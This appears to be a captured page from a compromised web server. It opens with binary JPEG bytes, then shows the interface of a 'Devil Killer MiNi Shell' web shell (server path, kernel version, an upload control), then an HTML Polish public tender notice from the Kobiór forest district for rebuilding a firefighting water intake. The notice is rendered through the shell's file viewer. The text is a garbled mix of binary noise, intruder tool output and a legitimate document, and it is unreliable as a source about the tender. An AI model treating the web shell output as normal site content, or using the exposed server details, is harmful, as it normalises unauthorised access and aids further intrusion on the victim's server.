JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251002/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251002/0045353101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa punktu czerpania wodu na cele gaśnicze - w leśnictwie Radostowice Nadleśnictwa Kobiór </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Panstwa Państwowe Gospodarstwo Leśne &#34;Lasy Państwowe&#34; - Nadleśnictwo Kobiór</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Nadleśnictwo Kobiór</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272536267</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Katowicka 141</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piasek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-211</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kobior@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kobior.katowice.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa punktu czerpania wodu na cele gaśnicze - w leśnictwie Radostowice Nadleśnictwa Kobiór </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5fea352d-8ab6-4862-a5fb-cc5a07e79a5a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00453531</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00202322/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa punktu czerpania wody w leśnictwie Radostowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">a) Komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności<br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>dedykowane formularza/modułu Wiadomości dostępnego na platformie JOSEPHINE oraz poczty elektronicznej. We wszelkiej<br/>korespondencji Zamawiający i Wykonawcy posługują się numerem postępowania oraz numerem pakietu wskazanym w SWZ.<br/>b) Zamawiający będzie również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email<br/>kobior@katowice.lasy.gov.pl;<br/>c) Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów w postaci papierowej (elektroniczne kopie<br/>dokumentów stworzonych w postaci papierowej) składane są przez Wykonawcę za pośrednictwem platformy JOSEPHINE jako<br/>załącznik lub na wskazany w lit. b)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne znajdują się w<br/>stopce ekranu głównego oprogramowania JOSEPHINE po kliknięciu w słowo „Wsparcie”<br/>h ttps://josephine.proebiz.com/pl/support.<br/>Informacje organizacyjne takie jak opis ekranu głównego portalu JOSEPHINE, rejestracja wykonawcy, wprowadzenie podpisu<br/>elektronicznego użytkownika wykonawcy, logowanie się za pomocą hasła, logowanie się za pomocą podpisu<br/>elektronicznego, składanie oferty i wymaganych dokumentów, elektroniczna komunikacja znajdują się w dokumencie „JOSEPHINE –<br/>Skrócona Instrukcja – Wykonawca”, który dostępny jest do pobrania z ekranu głównego portalu JOSEPHINE.<br/>Przeglądanie i pobieranie publicznej treści dokumentacji dotyczącej niniejszego postępowania nie wymaga posiadania konta na<br/>platformie JOSEPHINE ani logowania.<br/>Wykonawca ma w środowisku oprogramowania JOSEPHINE możliwość dodać do oferty dokumenty elektroniczne (pliki). W<br/>przypadku komunikacji całkowita maksymalna objętość danych jednego pliku wynosi 150 MB.<br/>Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie JOSEPHINE. Za datę przekazania wniosków, zawiadomień,<br/>dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów w postaci papierowej (elektronicznych kopii<br/>dokumentów stworzonych w postaci papierowej) oraz innych informacji przyjmuje się datę ich przekazania na adres poczty<br/>elektronicznej Zamawiającego wskazany w pkt 10.9 lit b) SWZ lub złożenia na platformie JOSEPHINE.<br/>10.8. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowanie) musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 r., poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zam. inf., iż administratorem danych osobowych jest PGLP Nadleśnictwo Kobiór. Adm.<br/>wyznaczył IODO, z którym w sprawach dotyczących przetwarzania danych os. można skontakt: ido.kobior@katowice.lasy.gov.pl<br/>Zam. przetwarza dane osob. zebrane w niniejszym post. o udz. zam. pub. w sposób gwarantujący zabezpiecz. przed ich<br/>bezprawnym rozpowszech..<br/>Zam. udostępnia dane os., o których mowa w art. 10 RODO w celu umożl. korzyst. ze środków ochrony pr., o których mowa w dziale<br/>IX PZP, do upływu term. do ich wniesienia.<br/>Do przetw. dan. os., o których mowa w art. 10 RODO mogą być dopuszcz. wyłącznie os. posiadające upowaz.. Osoby dopuszcz. do<br/>przetw. takich danych są obowiązane do zachowania ich w poufnościDane os. przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z prowadzeniem nin. post. o udz. zam. publ. oraz jego rozstrzyg., jak również, jeżeli nie ziszczą się<br/>przesłanki określone w art. 255-256 PZP – w celu zawarcia um. w sprawie zam. publ. oraz jej realizacji, a także udok. post. o udziel.<br/>zam. i jego archiwizacji.<br/>Odbiorcami danych os. będą osoby lub podmioty, którym dok. post. zostanie udostęp.w oparciu o przepisy PZP, a także ust. o<br/>dostępie do infor. publ..<br/>Dane os. pozyskane będą przech., zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zak. post. o udz.zam. publ., a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przech. obejmuje cały czas trwania umowy w sprawie zam. pub..<br/>Dane os. pozyskane w związku z prow. nin. post. o udz. zam. mogą zostać przekaz. podm. świadczącym usługi doradcze, w tym<br/>usługi prawne, i konsultingowe,<br/>Stos. do art. 22 RODO, decyzje dotyczące danych os. nie będą podejm. w sposób zautomat. Os., której dotyczą pozyskane w<br/>związku z prow. niniejszego post. dane os., ma prawo:<br/>1) dostępu do swoich danych os. – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy wykonanie obow., o których mowa w art. 15ust. 1 -3 RODO wymagałoby niewspółmiernie dużego wysiłku Zam. może żądać wsk. dod. inf.<br/>2) do sprost. swoich danych os. – zgodnie z art. 16 RODO, przy czym skorzyst.z upraw. do sprost lub uzup. danych os., o którym<br/>mowa w art. 16 RODO, nie może skutkować zmianą wyniku post. o udzielenie zam. publ., ani zmianą post. umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integral. protokołu oraz jego zał.;<br/>3) do żądania od Zam. och os. z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechow., w celu zapewnienia korzystania ze środków ochrony<br/>praw. lub w celu ochr. praw innej osoby fiz. lub praw., lub z uwagi na ważne względy interesu publ. Unii Eu. lub państwa człon.;<br/>prawo to nie ogranicza przetw. danych os. do czasu zakończenia post. o udz. zam. pub.;<br/>4) wniesienia skargi do Prezesa UODO w przypadku uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie<br/>danych os., w tym przepisy RODO.<br/>Ob. podania danych os. jest wymogiem ustaw. określ. w przepisach PZP, związanym z udz. w post. o udziel. zam. pub.;<br/>konsekwencje niepodania określonych danych określa PZP.<br/>Osobie, której dane os. zostały pozyskane przez Zam. w związku z prowadzeniem nin. post. o udz. zam. pub. nie przysługuje:<br/>1) prawo do usunięcia danych os., o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenosz.danych os., o którym mowa w art. 20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec przetw. dan.<br/>oso., a to z uwagi na fakt, że podstawą prawną przetw. danych os. jest art. 6 ust. 1 lit. c RODO.<br/>Dane os. mogą być przekaz. do organów publ. i urzędów państ. lub innych podm. upoważ. na lub wykonujących zadania<br/>realizowane w int. publ. lub w ramach sprawowania władzy publ. Dane os.są przekazywane do pod. przetwarzających dane w<br/>imieniu adm. danych os</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.10.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ,,Przebudowa punktu czerpania wody na działce ew. nr 150/6 w Suszcu&#34;<br/> <br/> <br/> Lokalizacja inwestycji: tereny leśne Nadleśnictwa Kobiór, leśnictwa Radostowice, działka nr 150/6 Gmina Suszec <br/> <br/><br/> Opis ogólny :<br/> Zadanie obejmuje:<br/>•	zabudowę zastawki kanałowej fi1500mm na rzece Korzeniec,<br/>•	wymianę ścianki czołowej przepustu,<br/>•	wymianę rury napełniającej zbiornik fi 200mm,<br/>•	wykonanie narzutu kamiennego na dnie rzeki,<br/>•	zabudowę umocnienia z płyt ażurowych,<br/>•	wykonanie schodów skarpowych wraz z zabudową płyty drogowej na dnie zbiornika,<br/>•	zabudowę schodów do śluzy,<br/>•	zabudowę barierek wzdłuż zbiornika od strony drogi,<br/>•	utwardzenie odcinka drogi pożarowej i placu do zawracania dla wozów bojowych straży pożarnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45247200-2 - Roboty w zakresie budowy tam i innych konstrukcji stałych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44132000-4 - Elementy przepustów</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów, i sposobu oceny ofert.<br/>1. Przy wyborze oferty Zamawiający będzie kierował się kryteriami:<br/>ceną (60%), okresem gwarancji (30%) i terminem płatności (10%)<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższa ilością przyznanych punktów, będącą sumą punktów przyznanych w<br/>poszczególnych kryteriach.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert lub innych<br/>składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez zam.<br/>5. Sposób przyznawania punktów w poszczególnych kryteriach:<br/>1) Kryterium – CENA (C)<br/>Ocenie podlegać będzie łączna cena brutto za przedmiot zamówienia, która podana zostanie w formularzu oferty.<br/>Punkty dla poszczególnych ofert przyznane zostaną według następującego wzoru:<br/>C = Najniższa cena brutto spośród ofert ocenianych x 100 x 60 %<br/>Cena brutto ocenianej oferty<br/>2) Kryterium – OKRES GWARANCJI (G)<br/>Sposób obliczenia punktów dla kryterium okres gwarancji jakości:<br/>a) Kryterium gwarancji jakości na całość zamówienia będzie rozpatrywane na podstawie zadeklarowanego w formularzu ofertowym<br/>okresu gwarancji jakości.<br/>b) Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego to 36 miesięcy liczonych od daty ostatecznego odbioru<br/>robót, przy czym bieg gwarancji rozpoczyna się z datą bezusterkowego odbioru protokołu końcowego. Najdłuższy oceniany okres<br/>gwarancji to 84 miesiące.<br/>c) Maksymalną liczbę punktów jaką można uzyskać w tym kryterium to 30 punktów.<br/>d) Wykonawca może zaproponować okres gwarancji jakości w pełnych miesiącach. Jeżeli Wykonawca wpisze okres gwarancji<br/>krótszy niż 36 miesięcy to przygotuje ofertę niezgodnie z SWZ co skutkować będzie odrzuceniem oferty.<br/>e) W przypadku braku wypełnienia w formularzu ofertowym stosownej rubryki Zamawiający uzna, że Wykonawca deklaruje<br/>najkrótszy tj. 36 miesięczny okres gwarancji jakości.<br/>f) ocena kryterium gwarancji odbywać się będzie poprzez porównanie okresu gwarancji wg wzoru<br/>A<br/>G = ------------x 30% x100<br/>B<br/>Gdzie:<br/>A- okres gwarancji w ocenianej ofercie, przy czym nie może być krótszy niż 36 miesięcy i nie może być dłuższy niż 84 miesiące. W<br/>przypadku dłuższego oferowanego okresu gwarancji niż 84 miesiące za liczbę A w liczniku podstawiona będzie wartość 84.<br/>B- najdłuższy okres gwarancji spośród wszystkich nieodrzuconych ofert, przy czym maksymalny okres gwarancji podstawiony do<br/>wzoru to okres 84 miesięcy. W przypadku gdy najdłuższy okres gwarancji spośród wszystkich nieodrzuconych ofert będzie wynosił<br/>84 miesiące, jako cały mianownik należy przyjąć równy 1. W przypadku dłuższych oferowanych okresów gwarancji niż 84 miesiące<br/>za liczbę B w mianowniku podstawiona będzie wartość 84.<br/>G- kryterium gwarancji - liczba punktów uzyskana w tym kryterium<br/>3) Kryterium termin płatności:<br/>3.1. Sposób obliczania punktów dla w/w kryterium<br/>TP - Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, przyjmuje się 10 pkt.<br/>Termin płatności Liczba punktów<br/>14 dni 0 pkt.<br/>21 dni 5 pkt.<br/>30 dni 10 pkt.<br/>a) Kryterium terminu płatności będzie rozpatrywane na podstawie terminu zadeklarowanego w formularzu ofertowym przez<br/>Wykonawcę.<br/>b) Maksymalny termin płatności wynosi 30 dni.<br/>c) Minimalny termin płatności 14 dni.<br/>d) Jeżeli Wykonawca zaoferuje termin płatności krótszy niż 14 dni to przygotuje ofertę niezgodnie z SWZ, co skutkować będzie<br/>odrzuceniem oferty.<br/>e) W przypadku nie wypełnienia w formularzu ofertowym stosownej rubryki Zamawiający uzna, że Wykonawca deklaruje 14 dniowy<br/>termin płatności.<br/>f) W przypadku zaoferowania terminu płatności dłuższego niż 30 dni to Zamawiający przyjmie zadeklarowany termin płatności<br/>jednakże przyzna punktację odpowiednią dla 30dni.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> sytuacji ekonomicznej lub finansowej :<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>- dysponuje środkami finansowymi lub zdolnością kredytową nie mniejszą niż 100 000,00 zł.<br/>- jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia, na sumę gwarancyjną określoną min. 200 000,00 zł.<br/>d. zdolności technicznej lub zawodowej:<br/>Warunek ten w zakresie doświadczenia zostanie spełniony, jeżeli Wykonawca wykaże:<br/>- oraz że w okresie ostatnich 5 lat przed terminem składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie) zrealizował, co najmniej 2 roboty z zakresu budowy/remontu budynków o wartości minimum 100 000,00 zł netto<br/>każda<br/>Warunek ten w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia:. Warunek ten w zakresie osób<br/>skierowanych przez Wykonawcę do realizacji zamówienia zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lub na<br/>moment realizacji zamówienia będzie dysponował osobami posiadającymi odpowiednie wykształcenie i kwalifikacje do<br/>wykonania zamówienia w tym w szczególności:<br/>• 1 osobę – kierownika budowy posiadającego: uprawnienia budowlane upoważniające do wykonywania samodzielnych<br/>funkcji technicznych w specjalności konstrukcyjno – budowlanej lub odpowiadające im ważne uprawnienia budowlane<br/>wydane w świetle wcześniej obowiązujących przepisów prawa lub przepisów nie będących prawem krajowym, będącego<br/>członkiem izby samorządu zawodowego, posiadający doświadczenie w kierowaniu robotami budowlanymi - który pełnił<br/>funkcję kierownika budowy przy budowie, przebudowie lub remoncie co najmniej jednego obiektu budowlanego, który<br/>będzie sprawował nadzór z ramienia Wykonawcy, kontrolę jakości oraz kierowanie robotami, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpisu lub informacji z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru<br/>lub ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych<br/>lub zdolność kredytową Wykonawcy min. o wysokości 100 000,00 zł w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem<br/>oraz dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę 